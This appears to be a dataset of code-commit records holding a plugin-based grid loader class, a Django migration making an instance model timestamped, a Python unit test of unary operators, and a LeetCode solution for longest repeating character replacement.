return go(nc, *args, **kwargs)
|
Add Gridded loader module (to be moved)class Gridded:
_grid_obj_classes = []
_grids_loaded = False
@classmethod
def _load_grid_objs(cls):
from pkg_resources import working_set
for ep in working_set.iter_entry_points('gridded.grid_objects'):
cls._grid_obj_classes.append(ep.load())
@classmethod
    def load(cls, nc, *args, **kwargs):
        if not cls._grids_loaded:      # discover plugin classes on first use
            cls._load_grid_objs()
            cls._grids_loaded = True
        for go in cls._grid_obj_classes:
if hasattr(go, 'is_mine') and go.is_mine(nc):
return go(nc, *args, **kwargs)
|
<commit_before><commit_msg>Add Gridded loader module (to be moved)<commit_after>class Gridded:
_grid_obj_classes = []
_grids_loaded = False
@classmethod
def _load_grid_objs(cls):
from pkg_resources import working_set
for ep in working_set.iter_entry_points('gridded.grid_objects'):
cls._grid_obj_classes.append(ep.load())
@classmethod
    def load(cls, nc, *args, **kwargs):
        if not cls._grids_loaded:      # discover plugin classes on first use
            cls._load_grid_objs()
            cls._grids_loaded = True
        for go in cls._grid_obj_classes:
if hasattr(go, 'is_mine') and go.is_mine(nc):
return go(nc, *args, **kwargs)
|
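The loader discovers grid classes through the "gridded.grid_objects" entry-point group, but the record does not show how a plugin registers one. A hypothetical setup.py fragment (package and class names are illustrative, not from the source):

from setuptools import setup

setup(
    name="my-grid-plugin",  # hypothetical plugin package
    entry_points={
        "gridded.grid_objects": [
            # MyGrid must expose an is_mine(nc) check for load() to select it.
            "my_grid = my_grid_plugin:MyGrid",
        ],
    },
)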
|
d5ad063e5b893ec852a033636fb3e10401f54bdc
|
nodeconductor/iaas/migrations/0012_make_instance_timestamped_model.py
|
nodeconductor/iaas/migrations/0012_make_instance_timestamped_model.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
dependencies = [
('iaas', '0011_cloudprojectmembership_availability_zone'),
]
operations = [
migrations.AddField(
model_name='instance',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False),
preserve_default=True,
),
migrations.AddField(
model_name='instance',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False),
preserve_default=True,
),
]
|
Make instance a timestamped model
|
Make instance a timestamped model
|
Python
|
mit
|
opennode/nodeconductor,opennode/nodeconductor,opennode/nodeconductor
|
Make instance a timestamped model
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
dependencies = [
('iaas', '0011_cloudprojectmembership_availability_zone'),
]
operations = [
migrations.AddField(
model_name='instance',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False),
preserve_default=True,
),
migrations.AddField(
model_name='instance',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False),
preserve_default=True,
),
]
|
<commit_before><commit_msg>Make instance a timestamped model<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
dependencies = [
('iaas', '0011_cloudprojectmembership_availability_zone'),
]
operations = [
migrations.AddField(
model_name='instance',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False),
preserve_default=True,
),
migrations.AddField(
model_name='instance',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False),
preserve_default=True,
),
]
|
Make instance a timestamped model# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
dependencies = [
('iaas', '0011_cloudprojectmembership_availability_zone'),
]
operations = [
migrations.AddField(
model_name='instance',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False),
preserve_default=True,
),
migrations.AddField(
model_name='instance',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False),
preserve_default=True,
),
]
|
<commit_before><commit_msg>Make instance a timestamped model<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
dependencies = [
('iaas', '0011_cloudprojectmembership_availability_zone'),
]
operations = [
migrations.AddField(
model_name='instance',
name='created',
field=model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, verbose_name='created', editable=False),
preserve_default=True,
),
migrations.AddField(
model_name='instance',
name='modified',
field=model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, verbose_name='modified', editable=False),
preserve_default=True,
),
]
|
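Both fields come from django-model-utils rather than Django core: AutoCreatedField is stamped once with timezone.now when the row is created, while AutoLastModifiedField refreshes itself on every save. The observable effect, sketched against a hypothetical existing row (some_pk is a placeholder, not defined in the record):

inst = Instance.objects.get(pk=some_pk)  # some_pk is a placeholder
before = inst.modified
inst.save()
inst.refresh_from_db()
assert inst.modified > before            # re-stamped on every save
assert inst.created <= inst.modified     # created is never touched again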
|
5255b69390caa52d7eab096cf95d62bb54fd6dd2
|
Lib/test/test_unary.py
|
Lib/test/test_unary.py
|
"""Test compiler changes for unary ops (+, -, ~) introduced in Python 2.2"""
import unittest
from test_support import run_unittest
class UnaryOpTestCase(unittest.TestCase):
def test_negative(self):
self.assert_(-2 == 0 - 2)
self.assert_(-0 == 0)
self.assert_(--2 == 2)
self.assert_(-2L == 0 - 2L)
self.assert_(-2.0 == 0 - 2.0)
self.assert_(-2j == 0 - 2j)
def test_positive(self):
self.assert_(+2 == 2)
self.assert_(+0 == 0)
self.assert_(++2 == 2)
self.assert_(+2L == 2L)
self.assert_(+2.0 == 2.0)
self.assert_(+2j == 2j)
def test_invert(self):
        self.assert_(~2 == -3)       # ~x == -x - 1
        self.assert_(~0 == -1)
        self.assert_(~~2 == 2)
        self.assert_(~2L == -3L)
def test_overflow(self):
self.assertRaises(OverflowError, eval, "+" + ("9" * 32))
self.assertRaises(OverflowError, eval, "-" + ("9" * 32))
self.assertRaises(OverflowError, eval, "~" + ("9" * 32))
def test_bad_types(self):
for op in '+', '-', '~':
self.assertRaises(TypeError, eval, op + "'a'")
self.assertRaises(TypeError, eval, op + "u'a'")
self.assertRaises(TypeError, eval, "~2j")
self.assertRaises(TypeError, eval, "~2.0")
run_unittest(UnaryOpTestCase)
|
Test the unary operator changes to the compiler
|
Test the unary operator changes to the compiler
|
Python
|
mit
|
sk-/python2.7-type-annotator,sk-/python2.7-type-annotator,sk-/python2.7-type-annotator
|
Test the unary operator changes to the compiler
|
"""Test compiler changes for unary ops (+, -, ~) introduced in Python 2.2"""
import unittest
from test_support import run_unittest
class UnaryOpTestCase(unittest.TestCase):
def test_negative(self):
self.assert_(-2 == 0 - 2)
self.assert_(-0 == 0)
self.assert_(--2 == 2)
self.assert_(-2L == 0 - 2L)
self.assert_(-2.0 == 0 - 2.0)
self.assert_(-2j == 0 - 2j)
def test_positive(self):
self.assert_(+2 == 2)
self.assert_(+0 == 0)
self.assert_(++2 == 2)
self.assert_(+2L == 2L)
self.assert_(+2.0 == 2.0)
self.assert_(+2j == 2j)
def test_invert(self):
        self.assert_(~2 == -3)       # ~x == -x - 1
        self.assert_(~0 == -1)
        self.assert_(~~2 == 2)
        self.assert_(~2L == -3L)
def test_overflow(self):
self.assertRaises(OverflowError, eval, "+" + ("9" * 32))
self.assertRaises(OverflowError, eval, "-" + ("9" * 32))
self.assertRaises(OverflowError, eval, "~" + ("9" * 32))
def test_bad_types(self):
for op in '+', '-', '~':
self.assertRaises(TypeError, eval, op + "'a'")
self.assertRaises(TypeError, eval, op + "u'a'")
self.assertRaises(TypeError, eval, "~2j")
self.assertRaises(TypeError, eval, "~2.0")
run_unittest(UnaryOpTestCase)
|
<commit_before><commit_msg>Test the unary operator changes to the compiler<commit_after>
|
"""Test compiler changes for unary ops (+, -, ~) introduced in Python 2.2"""
import unittest
from test_support import run_unittest
class UnaryOpTestCase(unittest.TestCase):
def test_negative(self):
self.assert_(-2 == 0 - 2)
self.assert_(-0 == 0)
self.assert_(--2 == 2)
self.assert_(-2L == 0 - 2L)
self.assert_(-2.0 == 0 - 2.0)
self.assert_(-2j == 0 - 2j)
def test_positive(self):
self.assert_(+2 == 2)
self.assert_(+0 == 0)
self.assert_(++2 == 2)
self.assert_(+2L == 2L)
self.assert_(+2.0 == 2.0)
self.assert_(+2j == 2j)
def test_invert(self):
        self.assert_(~2 == -3)       # ~x == -x - 1
        self.assert_(~0 == -1)
        self.assert_(~~2 == 2)
        self.assert_(~2L == -3L)
def test_overflow(self):
self.assertRaises(OverflowError, eval, "+" + ("9" * 32))
self.assertRaises(OverflowError, eval, "-" + ("9" * 32))
self.assertRaises(OverflowError, eval, "~" + ("9" * 32))
def test_bad_types(self):
for op in '+', '-', '~':
self.assertRaises(TypeError, eval, op + "'a'")
self.assertRaises(TypeError, eval, op + "u'a'")
self.assertRaises(TypeError, eval, "~2j")
self.assertRaises(TypeError, eval, "~2.0")
run_unittest(UnaryOpTestCase)
|
Test the unary operator changes to the compiler"""Test compiler changes for unary ops (+, -, ~) introduced in Python 2.2"""
import unittest
from test_support import run_unittest
class UnaryOpTestCase(unittest.TestCase):
def test_negative(self):
self.assert_(-2 == 0 - 2)
self.assert_(-0 == 0)
self.assert_(--2 == 2)
self.assert_(-2L == 0 - 2L)
self.assert_(-2.0 == 0 - 2.0)
self.assert_(-2j == 0 - 2j)
def test_positive(self):
self.assert_(+2 == 2)
self.assert_(+0 == 0)
self.assert_(++2 == 2)
self.assert_(+2L == 2L)
self.assert_(+2.0 == 2.0)
self.assert_(+2j == 2j)
def test_invert(self):
        self.assert_(~2 == -3)       # ~x == -x - 1
        self.assert_(~0 == -1)
        self.assert_(~~2 == 2)
        self.assert_(~2L == -3L)
def test_overflow(self):
self.assertRaises(OverflowError, eval, "+" + ("9" * 32))
self.assertRaises(OverflowError, eval, "-" + ("9" * 32))
self.assertRaises(OverflowError, eval, "~" + ("9" * 32))
def test_bad_types(self):
for op in '+', '-', '~':
self.assertRaises(TypeError, eval, op + "'a'")
self.assertRaises(TypeError, eval, op + "u'a'")
self.assertRaises(TypeError, eval, "~2j")
self.assertRaises(TypeError, eval, "~2.0")
run_unittest(UnaryOpTestCase)
|
<commit_before><commit_msg>Test the unary operator changes to the compiler<commit_after>"""Test compiler changes for unary ops (+, -, ~) introduced in Python 2.2"""
import unittest
from test_support import run_unittest
class UnaryOpTestCase(unittest.TestCase):
def test_negative(self):
self.assert_(-2 == 0 - 2)
self.assert_(-0 == 0)
self.assert_(--2 == 2)
self.assert_(-2L == 0 - 2L)
self.assert_(-2.0 == 0 - 2.0)
self.assert_(-2j == 0 - 2j)
def test_positive(self):
self.assert_(+2 == 2)
self.assert_(+0 == 0)
self.assert_(++2 == 2)
self.assert_(+2L == 2L)
self.assert_(+2.0 == 2.0)
self.assert_(+2j == 2j)
def test_invert(self):
        self.assert_(~2 == -3)       # ~x == -x - 1
        self.assert_(~0 == -1)
        self.assert_(~~2 == 2)
        self.assert_(~2L == -3L)
def test_overflow(self):
self.assertRaises(OverflowError, eval, "+" + ("9" * 32))
self.assertRaises(OverflowError, eval, "-" + ("9" * 32))
self.assertRaises(OverflowError, eval, "~" + ("9" * 32))
def test_bad_types(self):
for op in '+', '-', '~':
self.assertRaises(TypeError, eval, op + "'a'")
self.assertRaises(TypeError, eval, op + "u'a'")
self.assertRaises(TypeError, eval, "~2j")
self.assertRaises(TypeError, eval, "~2.0")
run_unittest(UnaryOpTestCase)
|
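The corrected test_invert above leans on the two's-complement identity for Python integers, ~x == -x - 1, which holds for any int:

for x in (0, 1, 2, 255, -7):
    assert ~x == -x - 1  # bitwise inversion flips all bits, so ~x + x == -1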
|
198b9972c4fd89f95660dd2cf71a6eb983dae76a
|
py/longest-repeating-character-replacement.py
|
py/longest-repeating-character-replacement.py
|
from collections import Counter
class Solution(object):
def characterReplacement(self, s, k):
"""
:type s: str
:type k: int
:rtype: int
"""
c = Counter()
lo = 0
M = 0
for hi, char in enumerate(s):
c[char] += 1
most_common_count = c.most_common(1)[0][1]
if (hi - lo + 1) - most_common_count > k:
c[s[lo]] -= 1
lo += 1
M = max(M, hi - lo + 1)
return M
|
Add py solution for 424. Longest Repeating Character Replacement
|
Add py solution for 424. Longest Repeating Character Replacement
424. Longest Repeating Character Replacement: https://leetcode.com/problems/longest-repeating-character-replacement/
|
Python
|
apache-2.0
|
ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode,ckclark/leetcode
|
Add py solution for 424. Longest Repeating Character Replacement
424. Longest Repeating Character Replacement: https://leetcode.com/problems/longest-repeating-character-replacement/
|
from collections import Counter
class Solution(object):
def characterReplacement(self, s, k):
"""
:type s: str
:type k: int
:rtype: int
"""
c = Counter()
lo = 0
M = 0
for hi, char in enumerate(s):
c[char] += 1
most_common_count = c.most_common(1)[0][1]
if (hi - lo + 1) - most_common_count > k:
c[s[lo]] -= 1
lo += 1
M = max(M, hi - lo + 1)
return M
|
<commit_before><commit_msg>Add py solution for 424. Longest Repeating Character Replacement
424. Longest Repeating Character Replacement: https://leetcode.com/problems/longest-repeating-character-replacement/<commit_after>
|
from collections import Counter
class Solution(object):
def characterReplacement(self, s, k):
"""
:type s: str
:type k: int
:rtype: int
"""
c = Counter()
lo = 0
M = 0
for hi, char in enumerate(s):
c[char] += 1
most_common_count = c.most_common(1)[0][1]
if (hi - lo + 1) - most_common_count > k:
c[s[lo]] -= 1
lo += 1
M = max(M, hi - lo + 1)
return M
|
Add py solution for 424. Longest Repeating Character Replacement
424. Longest Repeating Character Replacement: https://leetcode.com/problems/longest-repeating-character-replacement/from collections import Counter
class Solution(object):
def characterReplacement(self, s, k):
"""
:type s: str
:type k: int
:rtype: int
"""
c = Counter()
lo = 0
M = 0
for hi, char in enumerate(s):
c[char] += 1
most_common_count = c.most_common(1)[0][1]
if (hi - lo + 1) - most_common_count > k:
c[s[lo]] -= 1
lo += 1
M = max(M, hi - lo + 1)
return M
|
<commit_before><commit_msg>Add py solution for 424. Longest Repeating Character Replacement
424. Longest Repeating Character Replacement: https://leetcode.com/problems/longest-repeating-character-replacement/<commit_after>from collections import Counter
class Solution(object):
def characterReplacement(self, s, k):
"""
:type s: str
:type k: int
:rtype: int
"""
c = Counter()
lo = 0
M = 0
for hi, char in enumerate(s):
c[char] += 1
most_common_count = c.most_common(1)[0][1]
if (hi - lo + 1) - most_common_count > k:
c[s[lo]] -= 1
lo += 1
M = max(M, hi - lo + 1)
return M
|
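As a quick sanity check, assuming the Solution class above is in scope, the two canonical LeetCode examples both pass: with s = "ABAB" and k = 2 the whole string can be made uniform, and with s = "AABABBA" and k = 1 the best window has length 4:

sol = Solution()
assert sol.characterReplacement("ABAB", 2) == 4     # replace both A's or both B's
assert sol.characterReplacement("AABABBA", 1) == 4  # e.g. window "AABA" -> "AAAA"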